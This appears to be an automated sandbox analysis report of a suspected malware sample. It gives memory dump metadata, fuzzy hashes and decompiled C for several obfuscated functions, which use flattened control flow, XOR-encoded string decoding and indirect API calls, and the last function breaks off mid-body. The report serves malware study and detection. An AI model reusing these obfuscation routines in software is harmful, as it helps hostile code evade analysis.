                                                                                                                                                        0x00000000
                                                                                                                                                        0x012da067

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.368911222.00000000012D1000.00000020.00000001.sdmp, Offset: 012D0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.368893013.00000000012D0000.00000002.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.368940818.00000000012E4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.368999147.00000000012E7000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DateFormatOpen
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2727504171-0
                                                                                                                                                        • Opcode ID: 8a31b60b75aaf772d1b8d26170584148df0e268949103b7546a0d9ae24f100f8
                                                                                                                                                        • Instruction ID: 3297911bcbb32b3cefefb5b3b7e83398dbcd66e86c70cbf2d688ec17a0b67174
                                                                                                                                                        • Opcode Fuzzy Hash: 8a31b60b75aaf772d1b8d26170584148df0e268949103b7546a0d9ae24f100f8
                                                                                                                                                        • Instruction Fuzzy Hash: 2ED115323297C08ADB258B29E450BAE7B60E7C6B84F54402ADBCE47B54DF7EC541CB05
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00007FFD696A1284, Relevance: .3, Instructions: 306COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.369882428.00007FFD696A1000.00000020.00020000.sdmp, Offset: 00007FFD696A0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.369865940.00007FFD696A0000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369900853.00007FFD696BA000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369921866.00007FFD696CD000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369945199.00007FFD696CF000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369953900.00007FFD696D1000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: d9251d8199ca9df8cc34709c45bac193ed270da37d4dc3a84e48d9b2ce2e03b7
                                                                                                                                                        • Instruction ID: d1bd07dcd849157f3053642055bf620a2e01dfa7c93c82080783f3f179a840d5
                                                                                                                                                        • Opcode Fuzzy Hash: d9251d8199ca9df8cc34709c45bac193ed270da37d4dc3a84e48d9b2ce2e03b7
                                                                                                                                                        • Instruction Fuzzy Hash: F2B14672B09B958AFB648EA6C9647BA2795EB51BCCF0B9035CE1A87780CE3CD441C701
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 012D3B01, Relevance: .3, Instructions: 262COMMONCrypto
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 95%
                                                                                                                                                        			E012D3B01(unsigned int __edx, long long __rcx, long long __rdx, signed int _a40) {
				char _v108;
				char _v152;
				long long _v160;
				signed int _v164;
				void* _v176;
				signed int _v180;
				signed int _v184;
				unsigned int _v188;
				intOrPtr _v192;
				signed int _v193;
				signed int _v194;
				signed int _v195;
				signed char _v196;
				signed char _v197;
				signed char _v198;
				void* _t97;
				signed int _t112;
				signed int _t157;
				unsigned int _t160;
				signed long long _t216;
				long long _t220;
				char* _t221;
				intOrPtr* _t223;
				intOrPtr _t225;
				void* _t226;
				long long _t227;

				_t220 = __rcx;
				_t160 = __edx;
				r14d = r9d;
				r13d = r8d;
				_v160 = __rdx;
				_t227 = __rcx;
				_v176 =  &_v152;
				_t216 = _v176;
				asm("movaps xmm0, [0x104e3]");
				asm("movaps [eax+0x10], xmm0");
				asm("movaps xmm0, [0x104c8]");
				asm("movaps [eax], xmm0");
				 *((long long*)(_t216 + 0x20)) = __rcx;
				_t78 = 0;
				_t223 =  &_v108;
				 *((char*)(_t223 - 4)) = 0;
				 *_t223 = 0x76bb67d8;
				 *((intOrPtr*)(_t223 + 4)) = 0x7abf63dc;
				 *((intOrPtr*)(_t223 + 8)) = 0x7eb36fd0;
				 *((intOrPtr*)(_t223 + 0xc)) = 0x62b76bd4;
				 *((intOrPtr*)(_t223 + 0x10)) = 0x61ac77c8;
				 *((intOrPtr*)(_t223 + 0x14)) = 0x6aaf73cc;
				 *((intOrPtr*)(_t223 + 0x18)) = 0x3c87fc0;
				 *((intOrPtr*)(_t223 + 0x1c)) = 0x7cc16ab;
				 *((intOrPtr*)(_t223 + 0x20)) = 0xbc012af;
				 *((intOrPtr*)(_t223 + 0x24)) = 0x32f82599;
				if( *((intOrPtr*)(_t223 - 4)) != 0) {
					L3:
					_t221 =  &_v152;
					r8d = 0x25;
					E012DC96E(_t78, _t221, _t223);
					_v198 = (_a40 + 0x00000003 ^ 0x000000f8) & _a40 + 0x00000003;
					_v197 = (_t160 >> 0x00000003) + 0x00000075 & 0x00000007;
					_v196 = ((_t160 >> 0x00000006) + 0x00000007 ^ 0x000000f8) & (_t160 >> 0x00000006) + 0x00000007;
					_v184 = ( *(_t227 + _t221) & 0x000000ff ^ 0xffffffff | (( *(_t227 + _t216) & 0x000000ff) << 0x00000010 & 0x00980000 | (( *(_t227 + _t216) & 0x000000ff) << 0x00000010 ^ 0xffffffff) & 0x3a67c4d7) ^ (( *(_t227 + _t221) & 0x000000ff) << 0x00000008 & 0x00003b00 | (( *(_t227 + _t221) & 0x000000ff) << 0x00000008 ^ 0xffffffff) & 0x3a67c4d7) ^ 0xffffffff) ^ 0xffffffff | ( *(_t227 + _t221) & 0x7c | 0xc1db7483 & ( *(_t227 + _t221) & 0x000000ff ^ 0xffffffff)) ^ (((( *(_t227 + _t216) & 0x000000ff) << 0x00000010 & 0x00980000 | (( *(_t227 + _t216) & 0x000000ff) << 0x00000010 ^ 0xffffffff) & 0x3a67c4d7) ^ (( *(_t227 + _t221) & 0x000000ff) << 0x00000008 & 0x00003b00 | (( *(_t227 + _t221) & 0x000000ff) << 0x00000008 ^ 0xffffffff) & 0x3a67c4d7)) & 0x00248b00 | ((( *(_t227 + _t216) & 0x000000ff) << 0x00000010 & 0x00980000 | (( *(_t227 + _t216) & 0x000000ff) << 0x00000010 ^ 0xffffffff) & 0x3a67c4d7) ^ (( *(_t227 + _t221) & 0x000000ff) << 0x00000008 & 0x00003b00 | (( *(_t227 + _t221) & 0x000000ff) << 0x00000008 ^ 0xffffffff) & 0x3a67c4d7) ^ 0xffffffff) & 0xc1db7483);
					r14d = r14d - r13d;
					_v180 = r14d;
					_t97 = 0xade717cf;
					do {
						L4:
						while(1) {
							L4:
							while(1) {
								if(_t97 <= 0x22b5dbe6) {
									if(_t97 > 0x1544050f) {
										if(_t97 == 0x15440510) {
											_t97 =  ==  ? 0x19720071 : 0x7f389491;
											r10d = 0x1a;
										} else {
											if(_t97 == 0x19720071) {
												_t225 = _v192;
												 *((char*)(_v160 + _t225)) =  *((intOrPtr*)(_t226 + _v188 % r10d + 0x50));
												r9b = _v195;
												r9b = r9b + _v194;
												r14d = r9d;
												r14b = r14b ^ 0x000000f8;
												r14b = r14b & r9b;
												_t112 = _v193;
												r9b = r9b + _t112;
												r15d = r9d;
												r15b = r15b ^ 0x000000f8;
												r15b = r15b & r9b;
												r9b = r9b + _t112;
												r9b = r9b & 0x00000007;
												r8d =  *(_t227 + _t225) & 0x000000ff;
												r8d = r8d & 0xffffff91;
												r8d = r8d | (r8d ^ 0xffffffff) & 0x6fb79f6e;
												r8d = r8d ^ (((_v188 << 0x00000005 & 0x736837c0 | (_v188 << 0x00000005 ^ 0xffffffff) & 0x8c97c834) ^ (_v188 >> 0x0000001b & 0x0000000b | (_v188 >> 0x0000001b ^ 0xffffffff) & 0x8c97c834)) & 0x90486091 | ((_v188 << 0x00000005 & 0x736837c0 | (_v188 << 0x00000005 ^ 0xffffffff) & 0x8c97c834) ^ (_v188 >> 0x0000001b & 0x0000000b | (_v188 >> 0x0000001b ^ 0xffffffff) & 0x8c97c834) ^ 0xffffffff) & 0x6fb79f6e);
												r11d = _v192;
												r11d = r11d + 1;
												_t97 = 0x64126717;
											}
										}
									} else {
										if(_t97 == 0xade717cf) {
											_t97 =  ==  ? 0xddd5d9c5 : 0x22b5dbe7;
											_t157 = r13d;
										} else {
											if(_t97 == 0xddd5d9c5) {
												_v164 = _t157;
												r14b = _v198;
												r15b = _v197;
												r9b = _v196;
												_t97 = 0x64126717;
												r11d = 0;
												r8d = _v184;
											}
										}
									}
									continue;
								}
								if(_t97 <= 0x64126716) {
									if(_t97 == 0x22b5dbe7) {
										_t157 = ((_a40 & 0x27ac3a5a | (_a40 ^ 0xffffffff) & 0xd853c5a5) ^ (_v184 & 0x27ac3a5a | (_v184 ^ 0xffffffff) & 0xd853c5a5)) % _v180 + r13d;
										_t97 = 0xddd5d9c5;
										continue;
									}
									goto L17;
								}
								if(_t97 == 0x64126717) {
									_v195 = r14b;
									_v192 = r11d;
									_v194 = r15b;
									_v188 = r8d;
									_v193 = r9b;
									_t97 =  <  ? 0x15440510 : 0x23891c96;
								} else {
									if(_t97 == 0x7f389491) {
										_t97 = 0x19720071;
										r10d = 0x24;
									}
								}
							}
						}
						L17:
					} while (_t97 != 0x23891c96);
					return _t97;
				} else {
					_t78 = 1;
					do {
						 *(_t226 + 0x78 + _t216 * 4) = ( *(_t226 + 0x78 + _t216 * 4) & 0x6cd6554b |  !( *(_t226 + 0x78 + _t216 * 4)) & 0x9329aab4) ^ 0xa1d18f2d;
						_t220 = _t220 + 1;
						_t216 = _t216 + 1;
					} while (_t216 != 0xb);
					goto L3;
				}
			}





























                                                                                                                                                        0x012d3b01
                                                                                                                                                        0x012d3b01
                                                                                                                                                        0x012d3b14
                                                                                                                                                        0x012d3b17
                                                                                                                                                        0x012d3b1a
                                                                                                                                                        0x012d3b1f
                                                                                                                                                        0x012d3b27
                                                                                                                                                        0x012d3b31
                                                                                                                                                        0x012d3b36
                                                                                                                                                        0x012d3b3d
                                                                                                                                                        0x012d3b41
                                                                                                                                                        0x012d3b48
                                                                                                                                                        0x012d3b50
                                                                                                                                                        0x012d3b54
                                                                                                                                                        0x012d3b56
                                                                                                                                                        0x012d3b5b
                                                                                                                                                        0x012d3b5e
                                                                                                                                                        0x012d3b64
                                                                                                                                                        0x012d3b6b
                                                                                                                                                        0x012d3b72
                                                                                                                                                        0x012d3b79
                                                                                                                                                        0x012d3b80
                                                                                                                                                        0x012d3b87
                                                                                                                                                        0x012d3b8e
                                                                                                                                                        0x012d3b95
                                                                                                                                                        0x012d3b9c
                                                                                                                                                        0x012d3ba6
                                                                                                                                                        0x012d3bdb
                                                                                                                                                        0x012d3bdb
                                                                                                                                                        0x012d3be0
                                                                                                                                                        0x012d3be6
                                                                                                                                                        0x012d3c00
                                                                                                                                                        0x012d3c0f
                                                                                                                                                        0x012d3c20
                                                                                                                                                        0x012d3c96
                                                                                                                                                        0x012d3c9a
                                                                                                                                                        0x012d3c9d
                                                                                                                                                        0x012d3ca2
                                                                                                                                                        0x012d3ca7
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d3ca7
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d3ca7
                                                                                                                                                        0x012d3cac
                                                                                                                                                        0x012d3cb3
                                                                                                                                                        0x012d3d18
                                                                                                                                                        0x012d3e4e
                                                                                                                                                        0x012d3e51
                                                                                                                                                        0x012d3d1e
                                                                                                                                                        0x012d3d23
                                                                                                                                                        0x012d3d35
                                                                                                                                                        0x012d3d3f
                                                                                                                                                        0x012d3d42
                                                                                                                                                        0x012d3d47
                                                                                                                                                        0x012d3d4c
                                                                                                                                                        0x012d3d51
                                                                                                                                                        0x012d3d54
                                                                                                                                                        0x012d3d57
                                                                                                                                                        0x012d3d5b
                                                                                                                                                        0x012d3d5e
                                                                                                                                                        0x012d3d61
                                                                                                                                                        0x012d3d64
                                                                                                                                                        0x012d3d67
                                                                                                                                                        0x012d3d6a
                                                                                                                                                        0x012d3d9f
                                                                                                                                                        0x012d3dbd
                                                                                                                                                        0x012d3dc1
                                                                                                                                                        0x012d3dc4
                                                                                                                                                        0x012d3dc7
                                                                                                                                                        0x012d3dcc
                                                                                                                                                        0x012d3dcf
                                                                                                                                                        0x012d3dcf
                                                                                                                                                        0x012d3d23
                                                                                                                                                        0x012d3cb5
                                                                                                                                                        0x012d3cba
                                                                                                                                                        0x012d3dff
                                                                                                                                                        0x012d3e02
                                                                                                                                                        0x012d3cc0
                                                                                                                                                        0x012d3cc5
                                                                                                                                                        0x012d3cc7
                                                                                                                                                        0x012d3ccb
                                                                                                                                                        0x012d3cd0
                                                                                                                                                        0x012d3cd5
                                                                                                                                                        0x012d3cda
                                                                                                                                                        0x012d3cdf
                                                                                                                                                        0x012d3ce2
                                                                                                                                                        0x012d3ce2
                                                                                                                                                        0x012d3cc5
                                                                                                                                                        0x012d3cba
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d3cb3
                                                                                                                                                        0x012d3cee
                                                                                                                                                        0x012d3dde
                                                                                                                                                        0x012d3e8f
                                                                                                                                                        0x012d3e92
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d3e92
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d3dde
                                                                                                                                                        0x012d3cf9
                                                                                                                                                        0x012d3e0a
                                                                                                                                                        0x012d3e0f
                                                                                                                                                        0x012d3e14
                                                                                                                                                        0x012d3e19
                                                                                                                                                        0x012d3e1e
                                                                                                                                                        0x012d3e37
                                                                                                                                                        0x012d3cff
                                                                                                                                                        0x012d3d04
                                                                                                                                                        0x012d3d06
                                                                                                                                                        0x012d3d0b
                                                                                                                                                        0x012d3d0b
                                                                                                                                                        0x012d3d04
                                                                                                                                                        0x012d3cf9
                                                                                                                                                        0x012d3ca7
                                                                                                                                                        0x012d3de0
                                                                                                                                                        0x012d3de0
                                                                                                                                                        0x012d3eb4
                                                                                                                                                        0x012d3ba8
                                                                                                                                                        0x012d3ba8
                                                                                                                                                        0x012d3baf
                                                                                                                                                        0x012d3bcb
                                                                                                                                                        0x012d3bcf
                                                                                                                                                        0x012d3bd2
                                                                                                                                                        0x012d3bd5
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d3baf

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.368911222.00000000012D1000.00000020.00000001.sdmp, Offset: 012D0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.368893013.00000000012D0000.00000002.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.368940818.00000000012E4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.368999147.00000000012E7000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 54ffeb9951d47fd8892865c20250f4703bf0c96efdaa5e6d3ec7a2f763dfd1b0
                                                                                                                                                        • Instruction ID: cdee88407441c75ae607fd01f7f9b518e124391252b32038e5ebeb24571f5686
                                                                                                                                                        • Opcode Fuzzy Hash: 54ffeb9951d47fd8892865c20250f4703bf0c96efdaa5e6d3ec7a2f763dfd1b0
                                                                                                                                                        • Instruction Fuzzy Hash: 7B9139A37286D447D725CF2AE89026EBFA2F3D9348F188229EB8587755C67CC945CB01
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 012D5372, Relevance: .2, Instructions: 194COMMONCrypto
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 37%
                                                                                                                                                        			E012D5372(long long* __rax, char* __rcx, char* __rdx) {
				signed int _v44;
				long long* _v48;
				long long* _v52;
				long long* _v56;
				char _v57;
				char _t27;
				long long* _t35;
				void* _t40;
				void* _t61;
				long long* _t62;
				long long* _t71;
				char* _t72;
				void* _t77;
				char* _t78;
				char* _t79;

				_t72 = __rcx;
				_t71 = __rax;
				_t78 = __rdx;
				_t79 = __rcx;
				_v44 = ( *(__rcx + 0xaa4) ^ 0xffffffe9) &  *(__rcx + 0xaa4);
				_t40 = 0x2c9ef10b;
				L1:
				while(1) {
					do {
						L1:
						while(1) {
							while(_t40 > 0xeab8d513) {
								if(_t40 <= 0x2c9ef10a) {
									if(_t40 > 0xef05faaa) {
										if(_t40 == 0xef05faab) {
											r8d = 0xadcf8c45;
											r9d = 0xa9;
											E012DFAD7(1, _t61, _t71, _t72);
											_t72 = _t78;
											_t27 =  *_t71();
											_t40 = 0xce5d4a6e;
											if(_t71 == 0) {
												continue;
											}
											L49:
											_t40 = 0xcfe6f865;
											continue;
										}
										if(_t40 != 0x230c86ee) {
											continue;
										}
										goto L49;
									}
									if(_t40 == 0xeab8d514) {
										r8d = 0x14648b9c;
										r9d = 0x36;
										E012DFAD7(1, _t61, _t71, _t72);
										_t27 =  *_t71();
										L41:
										_t40 = 0x2dab9c27;
									} else {
										if(_t40 == 0xeb43a13b) {
											_v52 = _t35;
											_v48 = _t62;
											_t71 = _v48;
											_t27 =  *((intOrPtr*)(_t79 + _t71 + 0xbfc));
											_v57 = _t27;
											_t40 = 0xef05faab;
											if(_v57 != 0) {
												_t40 = 0x6ca93824;
											}
										}
									}
									continue;
								}
								if(_t40 > 0x6ca93823) {
									if(_t40 == 0x6ca93824) {
										_t62 = _v48 + 1;
										_t35 = _v52 + 1;
										_t71 = _v52;
										 *((char*)(_t78 + _t71)) = _v57;
										_t40 = 0xeb43a13b;
									} else {
										if(_t40 == 0x6d63c791) {
											_t40 = 0x2dab9c27;
											if( *_t78 != 0) {
												_t40 = 0xa481407b;
											}
										}
									}
									continue;
								}
								if(_t40 == 0x2c9ef10b) {
									_t40 = 0xeab8d514;
									if(_v44 != 0) {
										_t40 = 0xc0c13bad;
									}
									continue;
								}
								if(_t40 == 0x6bb3e770) {
									r8d = 0xa7a1ede9;
									r9d = 0x1d5;
									E012DFAD7(6, _t61, _t71, _t72);
									r8d = 0xd;
									r9d = 1;
									_t27 =  *_t71();
									_t40 = 0xa0082294;
									goto L43;
								} else {
									if(_t40 != 0x2dab9c27) {
										continue;
									} else {
										return _t27;
									}
								}
							}
							if(_t40 > 0xc0c13bac) {
								if(_t40 > 0xcfe6f864) {
									if(_t40 == 0xcfe6f865) {
										goto L41;
									}
									if(_t40 == 0xe3f07672) {
										_t71 = _v56;
										 *((char*)(_t78 + _t71)) = 0x5c;
										_t40 = 0x9a152dd2;
									}
									continue;
								}
								if(_t40 == 0xc0c13bad) {
									r8d = 0xa7a1ede9;
									r9d = 0x1d5;
									E012DFAD7(6, _t61, _t71, _t72);
									r8d = 0x27;
									r9d = 1;
									_t27 =  *_t71();
									_t40 = 0x6bb3e770;
									break;
								} else {
									if(_t40 == 0xce5d4a6e) {
										r8d = 0xce1f1c4e;
										r9d = 0xc5;
										E012DFAD7(1, _t61, _t71, _t72);
										_t27 =  *_t71();
										_t40 = 0x230c86ee;
										if(_t27 != 0xb7) {
											_t40 = 0xbc535fb8;
										}
									}
									continue;
								}
							}
							if(_t40 > 0xa481407a) {
								if(_t40 == 0xa481407b) {
									r8d = 0x6efba682;
									r9d = 0x84;
									E012DFAD7(1, _t61, _t71, _t72);
									_t72 = _t78;
									_t27 =  *_t71();
									_v56 = _t27;
									_t71 = _v56 - 1;
									_t40 = 0x9a152dd2;
									if( *((char*)(_t78 + _t71)) != 0x5c) {
										_t40 = 0xe3f07672;
									}
								} else {
									if(_t40 == 0xbc535fb8) {
										_t27 = _t71;
										 *((char*)(_t78 + _t71)) = 0;
										_t40 = 0x230c86ee;
									}
								}
								continue;
							}
							if(_t40 == 0x9a152dd2) {
								_t16 = _t77 + 1; // 0x79849af
								_t35 = _t16;
								_t40 = 0xeb43a13b;
								_t62 = 0;
								continue;
							}
							if(_t40 != 0xa0082294) {
								continue;
							} else {
								 *_t78 = 0;
								goto L44;
							}
						}
						L43:
					} while (_t27 == 0);
					L44:
					_t40 = 0x6d63c791;
				}
			}


















                                                                                                                                                        0x012d5372
                                                                                                                                                        0x012d5372
                                                                                                                                                        0x012d537c
                                                                                                                                                        0x012d537f
                                                                                                                                                        0x012d538f
                                                                                                                                                        0x012d5393
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d5398
                                                                                                                                                        0x012d5398
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d5398
                                                                                                                                                        0x012d5398
                                                                                                                                                        0x012d53a6
                                                                                                                                                        0x012d540f
                                                                                                                                                        0x012d551d
                                                                                                                                                        0x012d5698
                                                                                                                                                        0x012d569e
                                                                                                                                                        0x012d56a4
                                                                                                                                                        0x012d56a9
                                                                                                                                                        0x012d56ae
                                                                                                                                                        0x012d56b0
                                                                                                                                                        0x012d56b8
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d56be
                                                                                                                                                        0x012d56be
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d56be
                                                                                                                                                        0x012d5529
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d552f
                                                                                                                                                        0x012d541b
                                                                                                                                                        0x012d55c5
                                                                                                                                                        0x012d55cb
                                                                                                                                                        0x012d55d1
                                                                                                                                                        0x012d55de
                                                                                                                                                        0x012d55e0
                                                                                                                                                        0x012d55e0
                                                                                                                                                        0x012d5421
                                                                                                                                                        0x012d5427
                                                                                                                                                        0x012d542d
                                                                                                                                                        0x012d5431
                                                                                                                                                        0x012d5435
                                                                                                                                                        0x012d543a
                                                                                                                                                        0x012d5442
                                                                                                                                                        0x012d544b
                                                                                                                                                        0x012d5450
                                                                                                                                                        0x012d5456
                                                                                                                                                        0x012d5456
                                                                                                                                                        0x012d5450
                                                                                                                                                        0x012d5427
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d541b
                                                                                                                                                        0x012d53ae
                                                                                                                                                        0x012d54be
                                                                                                                                                        0x012d5630
                                                                                                                                                        0x012d5636
                                                                                                                                                        0x012d5638
                                                                                                                                                        0x012d5641
                                                                                                                                                        0x012d5644
                                                                                                                                                        0x012d54c4
                                                                                                                                                        0x012d54ca
                                                                                                                                                        0x012d54d3
                                                                                                                                                        0x012d54d8
                                                                                                                                                        0x012d54de
                                                                                                                                                        0x012d54de
                                                                                                                                                        0x012d54d8
                                                                                                                                                        0x012d54ca
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d54be
                                                                                                                                                        0x012d53ba
                                                                                                                                                        0x012d5568
                                                                                                                                                        0x012d556d
                                                                                                                                                        0x012d5573
                                                                                                                                                        0x012d5573
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d556d
                                                                                                                                                        0x012d53c6
                                                                                                                                                        0x012d5584
                                                                                                                                                        0x012d558a
                                                                                                                                                        0x012d5590
                                                                                                                                                        0x012d559a
                                                                                                                                                        0x012d55a0
                                                                                                                                                        0x012d55a6
                                                                                                                                                        0x012d55a8
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d53cc
                                                                                                                                                        0x012d53d2
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d53d2
                                                                                                                                                        0x012d53c6
                                                                                                                                                        0x012d53df
                                                                                                                                                        0x012d5466
                                                                                                                                                        0x012d553a
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d5546
                                                                                                                                                        0x012d554c
                                                                                                                                                        0x012d5551
                                                                                                                                                        0x012d5555
                                                                                                                                                        0x012d555a
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d5546
                                                                                                                                                        0x012d5472
                                                                                                                                                        0x012d55f1
                                                                                                                                                        0x012d55f7
                                                                                                                                                        0x012d55fd
                                                                                                                                                        0x012d5607
                                                                                                                                                        0x012d560d
                                                                                                                                                        0x012d5613
                                                                                                                                                        0x012d5615
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d5478
                                                                                                                                                        0x012d547e
                                                                                                                                                        0x012d548b
                                                                                                                                                        0x012d5491
                                                                                                                                                        0x012d5497
                                                                                                                                                        0x012d549c
                                                                                                                                                        0x012d549e
                                                                                                                                                        0x012d54a8
                                                                                                                                                        0x012d54ae
                                                                                                                                                        0x012d54ae
                                                                                                                                                        0x012d54a8
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d547e
                                                                                                                                                        0x012d5472
                                                                                                                                                        0x012d53e7
                                                                                                                                                        0x012d54ee
                                                                                                                                                        0x012d5655
                                                                                                                                                        0x012d565b
                                                                                                                                                        0x012d5661
                                                                                                                                                        0x012d5666
                                                                                                                                                        0x012d5669
                                                                                                                                                        0x012d566b
                                                                                                                                                        0x012d5675
                                                                                                                                                        0x012d567c
                                                                                                                                                        0x012d5681
                                                                                                                                                        0x012d5687
                                                                                                                                                        0x012d5687
                                                                                                                                                        0x012d54f4
                                                                                                                                                        0x012d54fa
                                                                                                                                                        0x012d5507
                                                                                                                                                        0x012d5509
                                                                                                                                                        0x012d550d
                                                                                                                                                        0x012d550d
                                                                                                                                                        0x012d54fa
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d54ee
                                                                                                                                                        0x012d53f3
                                                                                                                                                        0x012d55af
                                                                                                                                                        0x012d55af
                                                                                                                                                        0x012d55b2
                                                                                                                                                        0x012d55b7
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d55b7
                                                                                                                                                        0x012d53ff
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d5401
                                                                                                                                                        0x012d5401
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d5401
                                                                                                                                                        0x012d53ff
                                                                                                                                                        0x012d561a
                                                                                                                                                        0x012d561a
                                                                                                                                                        0x012d5622
                                                                                                                                                        0x012d5622
                                                                                                                                                        0x012d5622

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.368911222.00000000012D1000.00000020.00000001.sdmp, Offset: 012D0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.368893013.00000000012D0000.00000002.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.368940818.00000000012E4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.368999147.00000000012E7000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 13673e48a2fe0215949f69f9ac9db43ed94df303ca50fd4413ce8c5812638b50
                                                                                                                                                        • Instruction ID: cfb9cabd0f6f169a2af269b9468d26acbe579a0dae98cc44faa67e72bbad30a3
                                                                                                                                                        • Opcode Fuzzy Hash: 13673e48a2fe0215949f69f9ac9db43ed94df303ca50fd4413ce8c5812638b50
                                                                                                                                                        • Instruction Fuzzy Hash: C6512B613383418BEBBD061DE4A173DAA614BD5744F58011FAF8797B90CDD9C5814F13
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 012D5EF8, Relevance: .1, Instructions: 144COMMONCrypto
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                        			E012D5EF8(signed int __rax, intOrPtr* __rcx, void* __rdx, void* __r8, signed int __r11) {
				void* _v48;
				signed int _v52;
				short _t39;
				signed int _t41;
				signed int _t54;
				void* _t65;
				short _t75;
				void* _t79;
				signed long long _t88;
				intOrPtr* _t93;
				void* _t94;

				_t94 = __rdx;
				_t93 = __rcx;
				r11d = r8d;
				r14d = r8d;
				_t88 = __rax * __r11 >> 0x21;
				r9d = __r8 + _t88;
				r9d = r9d + 0x6b;
				r8d = r8d >> 4;
				r8d = bpl;
				_t41 = r8d -  ~(_t88 + _t88 * 2) * 0x1b0;
				r10d = ((_t41 & 0x0000ffff) >> 2) * 0x4bdb;
				r10d = r10d >> 0x13;
				r10d = r10d + 0x63;
				_t39 = (0x00000003 & ((_t41 - (_t41 * 0x00002f69 >> 0x00000010) & 0x0000ffff) >> 0x00000001) + (_t41 * 0x00002f69 >> 0x00000010) >> 0x00000004) + 0x65;
				r14d = r14d - (__r11 * 0x2f684bdb >> 0x20) + (__r11 * 0x2f684bdb >> 0x20) * 2;
				r11d = ((r14d * 0x00000039 & 0x0000ffff) >> 0x00000009) + 0x00000067 & 0x000000ff;
				sil = sil - dil;
				sil = sil + 0x69;
				r14d = sil & 0xffffffff;
				_t65 =  ==  ? 0xc14eec1f : 0xb03f362e;
				_t79 = 0x1ec8ba93;
				L1:
				while(_t79 > 0x162950a5) {
					if(_t79 > 0x2c63d19e) {
						if(_t79 == 0x2c63d19f) {
							_t54 = _v52 + 1;
							_t79 = 0xfcf21132;
							continue;
						}
						if(_t79 != 0x680d1e25) {
							continue;
						}
						_t75 =  *((char*)(_t94 + _v52 + 0xfffffffa)) +  *((char*)(_t93 + (_v52 + 0xfffffffa) * 2)) + 0xffffffd0;
						_v48 = _t93 + _v52 * 2;
						 *_v48 = _t75;
						_t79 = 0x162950a6;
						if(_t75 < 0x61) {
							continue;
						}
						L18:
						_t79 = 0x2c63d19f;
						continue;
					}
					if(_t79 == 0x162950a6) {
						 *_v48 = 0x7a;
						goto L18;
					} else {
						if(_t79 == 0x1ec8ba93) {
							_t79 = _t65;
						}
						continue;
					}
				}
				if(_t79 <= 0xfcf21131) {
					if(_t79 == 0xb03f362e) {
						 *_t93 = r8w;
						 *((intOrPtr*)(_t93 + 2)) = r10w;
